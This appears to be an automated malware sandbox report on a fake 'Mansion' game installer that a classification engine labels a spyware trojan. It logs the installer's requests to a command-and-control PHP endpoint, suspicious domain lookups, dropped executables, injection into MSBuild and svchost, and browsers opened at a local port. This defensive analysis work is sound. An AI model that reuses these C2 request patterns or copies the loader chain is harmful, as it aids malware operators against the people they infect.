Source: global trafficHTTP traffic detected: GET /ud83c7gi0/8pe93ha5y.php?get=ZG93bmxvYWQ%3D&name=8J%2BqliBNYW5zaW9uIGdhbWU%3D&info=V2luZG93cyAxMCwgNDcyODQ3LCAxMjgweDEwMjQ%3D HTTP/1.1host: 95.216.224.46connection: keep-aliveaccept: */*accept-language: *sec-fetch-mode: corsuser-agent: undiciaccept-encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /ud83c7gi0/8pe93ha5y.php?get=Z2V0ZXhpdA%3D%3D&name=8J%2BqliBNYW5zaW9uIGdhbWU%3D&info=V2luZG93cyAxMCwgNDcyODQ3LCAxMjgweDEwMjQ%3D HTTP/1.1host: 95.216.224.46connection: keep-aliveaccept: */*accept-language: *sec-fetch-mode: corsuser-agent: undiciaccept-encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /ud83c7gi0/8pe93ha5y.php?get=Z2V0ZXhpdA%3D%3D&name=8J%2BqliBNYW5zaW9uIGdhbWU%3D&info=V2luZG93cyAxMCwgNDcyODQ3LCAxMjgweDEwMjQ%3D HTTP/1.1host: 95.216.224.46connection: keep-aliveaccept: */*accept-language: *sec-fetch-mode: corsuser-agent: undiciaccept-encoding: gzip, deflate
Source: global trafficDNS traffic detected: DNS query: time.windows.com
Source: global trafficDNS traffic detected: DNS query: ocsps.ssl.com
Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global trafficDNS traffic detected: DNS query: smartsjolutions.cyou
Source: global trafficDNS traffic detected: DNS query: importenptoc.com
Source: global trafficDNS traffic detected: DNS query: voicesharped.com
Source: global trafficDNS traffic detected: DNS query: inputrreparnt.com
Source: global trafficDNS traffic detected: DNS query: torpdidebar.com
Source: global trafficDNS traffic detected: DNS query: rebeldettern.com
Source: global trafficDNS traffic detected: DNS query: actiothreaz.com
Source: global trafficDNS traffic detected: DNS query: garulouscuto.com
Source: global trafficDNS traffic detected: DNS query: breedertremnd.com
Source: global trafficDNS traffic detected: DNS query: ntp1.net.berkeley.edu
Source: global trafficDNS traffic detected: DNS query: ts1.aco.net
Source: global trafficDNS traffic detected: DNS query: x.ns.gin.ntt.net
Source: global trafficDNS traffic detected: DNS query: ntp.time.in.ua
Source: global trafficDNS traffic detected: DNS query: time-a-g.nist.gov
Source: global trafficDNS traffic detected: DNS query: ntp.nict.jp
Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
Source: explorer.exe, 0000000D.00000000.1547614933.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1565835129.0000000008F83000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 0000000D.00000000.1547614933.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1565835129.0000000008F83000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 0000000D.00000000.1547614933.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1565835129.0000000008F83000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: Mansion_setup (1).exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 0000000D.00000000.1547614933.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1565835129.0000000008F83000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 0000000D.00000000.1565046627.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.1565016510.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.1564035206.0000000007C70000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.foreca.com
Source: explorer.exe, 0000000D.00000000.1565835129.0000000008F83000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 0000000D.00000000.1565835129.000000000913F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 0000000D.00000000.1565835129.0000000008F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000000D.00000000.1565835129.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: e67ccac6-1b55-47d3-986b-064f1ebcae9d.tmp.14.drString found in binary or memory: https://chrome.cloudflare-dns.com
Source: en-GB.pak.5.dr, tr.pak.5.drString found in binary or memory: https://chrome.google.com/webstore/category/extensions
Source: en-GB.pak.5.drString found in binary or memory: https://chrome.google.com/webstore?hl=en-GB&category=theme81https://myactivity.google.com/myactivity
Source: en-GB.pak.5.drString found in binary or memory: https://chrome.google.com/webstore?hl=en-GBShortcut
Source: tr.pak.5.drString found in binary or memory: https://chrome.google.com/webstore?hl=tr&category=theme81https://myactivity.google.com/myactivity/?u
Source: tr.pak.5.drString found in binary or memory: https://chrome.google.com/webstore?hl=trK
Source: en-GB.pak.5.dr, tr.pak.5.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherEnabled
Source: en-GB.pak.5.dr, tr.pak.5.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl
Source: en-GB.pak.5.dr, tr.pak.5.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl
Source: en-GB.pak.5.dr, tr.pak.5.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlGreylist
Source: en-GB.pak.5.dr, tr.pak.5.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlList
Source: en-GB.pak.5.dr, tr.pak.5.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUseIeSitelist
Source: explorer.exe, 0000000D.00000000.1568820754.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1c9Jin.img
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: en-GB.pak.5.dr, tr.pak.5.drString found in binary or memory: https://myactivity.google.com/
Source: explorer.exe, 0000000D.00000000.1568820754.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
Source: en-GB.pak.5.dr, tr.pak.5.drString found in binary or memory: https://passwords.google.comGoogle
Source: en-GB.pak.5.dr, tr.pak.5.drString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: en-GB.pak.5.dr, tr.pak.5.drString found in binary or memory: https://policies.google.com/
Source: explorer.exe, 0000000D.00000000.1568820754.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
Source: tr.pak.5.drString found in binary or memory: https://support.google.com/chrome/a/answer/9122284
Source: en-GB.pak.5.dr, tr.pak.5.drString found in binary or memory: https://support.google.com/chrome/answer/6098869
Source: en-GB.pak.5.dr, tr.pak.5.drString found in binary or memory: https://support.google.com/chromebook?p=app_intent
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000000D.00000000.1565835129.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/
Source: explorer.exe, 0000000D.00000000.1568820754.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
Source: tr.pak.5.drString found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlKurulu
Source: en-GB.pak.5.drString found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlManaged
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.pollensense.com/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49425
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49424
Source: unknownNetwork traffic detected: HTTP traffic on port 49435 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49431 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49429 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49426 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49441 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49438 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49436 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49432 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
Source: unknownNetwork traffic detected: HTTP traffic on port 49428 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49425 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49442 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49439 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49444
Source: unknownNetwork traffic detected: HTTP traffic on port 49437 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49442
Source: unknownNetwork traffic detected: HTTP traffic on port 49433 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49441
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49440
Source: unknownNetwork traffic detected: HTTP traffic on port 49427 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49443 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49424 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49439
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49438
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49437
Source: unknownNetwork traffic detected: HTTP traffic on port 49434 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49436
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49435
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49434
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49433
Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49432
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49431
Source: unknownNetwork traffic detected: HTTP traffic on port 49430 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49430
Source: unknownNetwork traffic detected: HTTP traffic on port 49440 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49444 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49429
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49428
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49427
Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49426
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49424 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49425 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49426 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49427 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49428 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49429 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49430 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49431 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49432 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49433 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49434 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49435 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49436 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49437 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49438 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49439 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49440 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49441 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49442 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49443 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49444 version: TLS 1.2

System Summary

barindex
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile dump: Mansion.exe.5.dr 163326464Jump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile dump: Mansion.exe0.5.dr 163326464Jump to dropped file
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exeProcess Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\Mansion_setup (1).exeProcess token adjusted: SecurityJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6176 -s 344
Source: libEGL.dll0.5.drStatic PE information: Number of sections : 11 > 10
Source: libEGL.dll.5.drStatic PE information: Number of sections : 11 > 10
Source: vulkan-1.dll0.5.drStatic PE information: Number of sections : 11 > 10
Source: Mansion.exe.5.drStatic PE information: Number of sections : 15 > 10
Source: vk_swiftshader.dll.5.drStatic PE information: Number of sections : 11 > 10
Source: vk_swiftshader.dll0.5.drStatic PE information: Number of sections : 11 > 10
Source: libGLESv2.dll.5.drStatic PE information: Number of sections : 11 > 10
Source: libGLESv2.dll0.5.drStatic PE information: Number of sections : 11 > 10
Source: Mansion.exe0.5.drStatic PE information: Number of sections : 15 > 10
Source: vulkan-1.dll.5.drStatic PE information: Number of sections : 11 > 10
Source: Mansion_setup (1).exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: qtZint.exe.9.drStatic PE information: Section: .qtmimed ZLIB complexity 0.998278287914692
Source: classification engineClassification label: mal80.troj.spyw.evad.winEXE@52/278@22/11
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeFile created: C:\Users\user\AppData\Roaming\my-electron-appJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeMutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4208:64:WilError_03
Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-f33e4931-9ab6-355492-e6e220284809}
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile created: C:\Users\user~1\AppData\Local\Temp\nsb7247.tmpJump to behavior
Source: Mansion_setup (1).exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile read: C:\Users\user\Desktop\Mansion_setup (1).exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\Mansion_setup (1).exe "C:\Users\user\Desktop\Mansion_setup (1).exe"
Source: C:\Users\user\Desktop\Mansion_setup (1).exeProcess created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe "C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\my-electron-app" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1660 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe "C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\my-electron-app" --mojo-platform-channel-handle=2940 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe "C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Roaming\my-electron-app" --app-path="C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\resources\app.asar" --enable-sandbox --first-renderer-process --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --time-ticks-at-unix-epoch=-1739628551283596 --launch-time-ticks=4519743123 --mojo-platform-channel-handle=3100 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess created: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe C:\games\DDR5_NetCache\ExtractJPEGcmd.exe
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess created: C:\games\DDR5_NetCache\qtZint.exe C:\games\DDR5_NetCache\qtZint.exe
Source: C:\Windows\explorer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6176 -s 344
Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user~1\AppData\Local\Temp\chrE697.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/c75c1857/bd5c97e1"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2096,i,7666385675108331514,3856656827583616406,262144 /prefetch:8
Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir="C:\Users\user~1\AppData\Local\Temp\chrEBD8.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/c75c1857/0da50779"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2532 --field-trial-handle=1980,i,2109797830624315799,4341307213657690466,262144 /prefetch:3
Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmlaunch.exe "C:\Program Files\Windows Media Player\wmlaunch.exe"
Source: C:\Program Files\Windows Media Player\wmlaunch.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
Source: C:\Users\user\Desktop\Mansion_setup (1).exeProcess created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeJump to behavior
